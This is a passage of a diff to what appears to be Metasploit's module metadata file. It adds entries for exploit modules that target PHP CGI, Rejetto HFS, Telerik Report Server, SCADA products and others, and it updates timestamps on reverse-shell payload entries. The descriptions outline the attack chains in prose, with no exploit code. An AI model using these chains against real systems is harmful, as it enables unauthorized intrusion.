+    "disclosure_date": "2024-03-12",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "chebuya"
+    ],
+    "description": "NorthStar C2, prior to commit 7674a44 on March 11 2024, contains a vulnerability where the logs page is\n          vulnerable to a stored xss.\n          An unauthenticated user can simulate an agent registration to cause the XSS and take over a users session.\n          With this access, it is then possible to run a new payload on all of the NorthStar C2 compromised hosts\n          (agents), and kill the original agent.\n\n          Successfully tested against NorthStar C2 commit e7fdce148b6a81516e8aa5e5e037acd082611f73 running on\n          Ubuntu 22.04. The agent was running on Windows 10 19045.",
+    "references": [
+      "URL-https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/",
+      "URL-https://github.com/chebuya/CVE-2024-28741-northstar-agent-rce-poc",
+      "URL-https://github.com/EnginDemirbilek/NorthStarC2/commit/7674a4457fca83058a157c03aa7bccd02f4a213c",
+      "CVE-2024-28741"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2024-04-24 16:54:58 +0000",
+    "path": "/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/northstar_c2_xss_to_agent_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/novell_imanager_upload": {
    "name": "Novell iManager getMultiPartParameters Arbitrary File Upload",
    "fullname": "exploit/windows/http/novell_imanager_upload",
@@ -165780,6 +167950,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/http/php_cgi_arg_injection_rce_cve_2024_4577": {
+    "name": "PHP CGI Argument Injection Remote Code Execution",
+    "fullname": "exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-06-06",
+    "type": "exploit",
+    "author": [
+      "Orange Tsai",
+      "watchTowr",
+      "sfewer-r7"
+    ],
+    "description": "This module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations\n          on a Windows target. A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that\n          the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D)\n          character. Additionally a target web server must be configured to run PHP under CGI mode, or directly expose\n          the PHP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch),\n          and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have note received patches.\n\n          XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target\n          an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode.",
+    "references": [
+      "CVE-2024-4577",
+      "URL-https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/",
+      "URL-https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/"
+    ],
+    "platform": "PHP,Windows",
+    "arch": "php, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows PHP",
+      "Windows Command"
+    ],
+    "mod_time": "2024-06-13 15:10:14 +0000",
+    "path": "/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/php_cgi_arg_injection_rce_cve_2024_4577",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/plesk_mylittleadmin_viewstate": {
    "name": "Plesk/myLittleAdmin ViewState .NET Deserialization",
    "fullname": "exploit/windows/http/plesk_mylittleadmin_viewstate",
@@ -166241,6 +168474,67 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_windows/http/rejetto_hfs_rce_cve_2024_23692": {
+    "name": "Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution",
+    "fullname": "exploit/windows/http/rejetto_hfs_rce_cve_2024_23692",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-05-25",
+    "type": "exploit",
+    "author": [
+      "sfewer-r7",
+      "Arseniy Sharoglazov"
+    ],
+    "description": "The Rejetto HTTP File Server (HFS) version 2.x is vulnerable to an unauthenticated server side template\n          injection (SSTI) vulnerability. A remote unauthenticated attacker can execute code with the privileges\n          of the user account running the HFS.exe server process. This exploit has been tested to work against version\n          2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers\n          and no patch is available. Users are recommended to upgrade to newer supported versions.",
+    "references": [
+      "CVE-2024-23692",
+      "URL-https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-06-11 16:26:04 +0000",
+    "path": "/modules/exploits/windows/http/rejetto_hfs_rce_cve_2024_23692.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/rejetto_hfs_rce_cve_2024_23692",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/sambar6_search_results": {
    "name": "Sambar 6 Search Results Buffer Overflow",
    "fullname": "exploit/windows/http/sambar6_search_results",
@@ -166819,7 +169113,7 @@
      "Windows Dropper",
      "PowerShell Stager"
    ],
-    "mod_time": "2021-06-14 10:15:27 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb",
    "is_install_path": true,
    "ref_name": "windows/http/sharepoint_ssi_viewstate",
@@ -166885,7 +169179,7 @@
      "Windows Dropper",
      "PowerShell Stager"
    ],
-    "mod_time": "2021-06-14 10:15:27 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/windows/http/sharepoint_unsafe_control.rb",
    "is_install_path": true,
    "ref_name": "windows/http/sharepoint_unsafe_control",
@@ -167209,6 +169503,72 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/http/softing_sis_rce": {
+    "name": "Softing Secure Integration Server v1.22 Remote Code Execution",
+    "fullname": "exploit/windows/http/softing_sis_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-07-27",
+    "type": "exploit",
+    "author": [
+      "Chris Anastasio (muffin) of Incite Team",
+      "Steven Seeley (mr_me) of Incite Team",
+      "Imran E. Dawoodjee <imrandawoodjee.infosec@gmail.com>"
+    ],
+    "description": "This module chains two vulnerabilities (CVE-2022-1373 and CVE-2022-2334) to achieve authenticated remote code execution against Softing Secure Integration Server v1.22.\n\n          In CVE-2022-1373, the restore configuration feature is vulnerable to a directory traversal vulnerablity when processing zip files. When using the \"restore configuration\" feature to upload a zip file containing a path traversal file which is a dll called ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\wbem\\wbemcomn.dll. This causes the file C:\\Windows\\System32\\wbem\\wbemcomn.dll to be created and executed upon touching the disk.\n\n          In CVE-2022-2334, the planted wbemcomn.dll is used in a DLL hijacking attack when Softing Secure Integration Server restarts upon restoring configuration, which allows us to execute arbitrary code on the target system.\n\n          The chain demonstrated in Pwn2Own used a signature instead of a password. The signature was acquired by running an ARP spoofing attack against the local network where the Softing SIS server was located. A username is also required for signature authentication.\n\n          A custom DLL can be provided to use in the exploit instead of using the default MSF-generated one. Refer to the module documentation for more details.",
+    "references": [
+      "CVE-2022-1373",
+      "CVE-2022-2334",
+      "ZDI-22-1154",
+      "ZDI-22-1156",
+      "URL-https://industrial.softing.com/fileadmin/psirt/downloads/syt-2022-5.html",
+      "URL-https://ide0x90.github.io/softing-sis-122-rce/"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": 8099,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows x64"
+    ],
+    "mod_time": "2024-04-19 23:05:02 +0000",
+    "path": "/modules/exploits/windows/http/softing_sis_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/softing_sis_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_windows/http/solarwinds_fsm_userlogin": {
    "name": "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability",
    "fullname": "exploit/windows/http/solarwinds_fsm_userlogin",
@@ -167771,6 +170131,73 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_windows/http/telerik_report_server_deserialization": {
+    "name": "Telerik Report Server Auth Bypass and Deserialization RCE",
+    "fullname": "exploit/windows/http/telerik_report_server_deserialization",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-06-04",
+    "type": "exploit",
+    "author": [
+      "SinSinology",
+      "Soroush Dalili",
+      "Unknown",
+      "Spencer McIntyre"
+    ],
+    "description": "This module chains an authentication bypass vulnerability (CVE-2024-4358) with a deserialization vulnerability\n          (CVE-2024-1800) to obtain remote code execution against Telerik Report Server version 10.0.24.130 and prior.\n          The authentication bypass flaw allows an unauthenticated user to create a new user with administrative privileges.\n          The USERNAME datastore option can be used to authenticate with an existing account to prevent the creation of a\n          new one. The deserialization flaw works by uploading a specially crafted report that when loaded will execute an\n          OS command as NT AUTHORITY\\SYSTEM. The module will automatically delete the created report but not the account\n          because users are unable to delete themselves.",
+    "references": [
+      "CVE-2024-1800",
+      "CVE-2024-4358",
+      "URL-https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 83,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-06-06 14:56:33 +0000",
+    "path": "/modules/exploits/windows/http/telerik_report_server_deserialization.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/telerik_report_server_deserialization",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "RelatedModules": [
+        "auxiliary/scanner/http/telerik_report_server_auth_bypass"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/tomcat_cgi_cmdlineargs": {
    "name": "Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability",
    "fullname": "exploit/windows/http/tomcat_cgi_cmdlineargs",
@@ -182681,7 +185108,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2024-03-12 14:09:22 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/exploits/windows/mssql/mssql_payload.rb",
    "is_install_path": true,
    "ref_name": "windows/mssql/mssql_payload",
@@ -183025,7 +185452,7 @@
    "targets": [
      "Windows Universal (x64) - v7.80.3132"
    ],
-    "mod_time": "2023-07-14 12:46:26 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/windows/nimsoft/nimcontroller_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/nimsoft/nimcontroller_bof",
@@ -184692,6 +187119,57 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/scada/diaenergie_sqli": {
+    "name": "DIAEnergie SQL Injection (CVE-2024-4548)",
+    "fullname": "exploit/windows/scada/diaenergie_sqli",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-05-06",
+    "type": "exploit",
+    "author": [
+      "Michael Heinzl",
+      "Tenable"
+    ],
+    "description": "SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.\n          This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get executed in the context of NT AUTHORITY\\SYSTEM.",
+    "references": [
+      "URL-https://www.tenable.com/security/research/tra-2024-13",
+      "CVE-2024-4548"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 928,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows_Fetch"
+    ],
+    "mod_time": "2024-08-19 22:47:19 +0000",
+    "path": "/modules/exploits/windows/scada/diaenergie_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "windows/scada/diaenergie_sqli",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/scada/factorylink_csservice": {
    "name": "Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",
    "fullname": "exploit/windows/scada/factorylink_csservice",
@@ -185202,6 +187680,65 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/scada/mypro_cmdexe": {
+    "name": "mySCADA MyPRO Authenticated Command Injection (CVE-2023-28384)",
+    "fullname": "exploit/windows/scada/mypro_cmdexe",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-09-22",
+    "type": "exploit",
+    "author": [
+      "Michael Heinzl"
+    ],
+    "description": "Authenticated Command Injection in MyPRO <= v8.28.0 from mySCADA.\n          The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\\SYSTEM.",
+    "references": [
+      "URL-https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06",
+      "CVE-2023-28384"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows_Fetch"
+    ],
+    "mod_time": "2024-07-25 23:54:27 +0000",
+    "path": "/modules/exploits/windows/scada/mypro_cmdexe.rb",
+    "is_install_path": true,
+    "ref_name": "windows/scada/mypro_cmdexe",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/scada/procyon_core_server": {
    "name": "Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow",
    "fullname": "exploit/windows/scada/procyon_core_server",
@@ -190311,7 +192848,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_http",
@@ -190349,7 +192886,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_https",
@@ -190387,7 +192924,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_tcp",
@@ -190461,7 +192998,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_http",
@@ -190499,7 +193036,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_https",
@@ -190537,7 +193074,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_tcp",
@@ -199241,7 +201778,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-08-01 15:02:11 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_aws_instance_connect.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_aws_instance_connect",
@@ -229147,7 +231684,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-08-01 15:02:11 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/payloads/singles/generic/shell_bind_aws_ssm.rb",
    "is_install_path": true,
    "ref_name": "generic/shell_bind_aws_ssm",
@@ -229255,7 +231792,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-11-05 09:43:48 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/payloads/singles/generic/ssh/interact.rb",
    "is_install_path": true,
    "ref_name": "generic/ssh/interact",
@@ -229716,7 +232253,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_http",
@@ -229754,7 +232291,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_https",
@@ -229792,7 +232329,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_tcp",
@@ -229904,7 +232441,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_http",
@@ -229942,7 +232479,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_https",
@@ -229980,7 +232517,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_tcp",
@@ -230205,7 +232742,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_http",
@@ -230243,7 +232780,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_https",
@@ -230281,7 +232818,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_tcp",
@@ -230469,7 +233006,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_http",
@@ -230507,7 +233044,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_https",
@@ -230545,7 +233082,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_tcp",
@@ -230582,7 +233119,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-05-21 12:52:12 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/exec.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/exec",
@@ -230660,7 +233197,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_http",
@@ -230698,7 +233235,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_https",
@@ -230736,7 +233273,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_tcp",
@@ -230925,7 +233462,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-05-21 12:52:12 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/exec.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/exec",
@@ -231003,7 +233540,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_http",
@@ -231041,7 +233578,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_https",
@@ -231079,7 +233616,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_tcp",
@@ -231269,7 +233806,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_http",
@@ -231307,7 +233844,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_https",
@@ -231345,7 +233882,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_tcp",
@@ -231599,7 +234136,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_http",
@@ -231637,7 +234174,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_https",
@@ -231675,7 +234212,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_tcp",
@@ -231713,7 +234250,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
+    "mod_time": "2024-07-16 11:47:14 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_http",
@@ -231751,7 +234288,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-19 12:11:18 +0000",
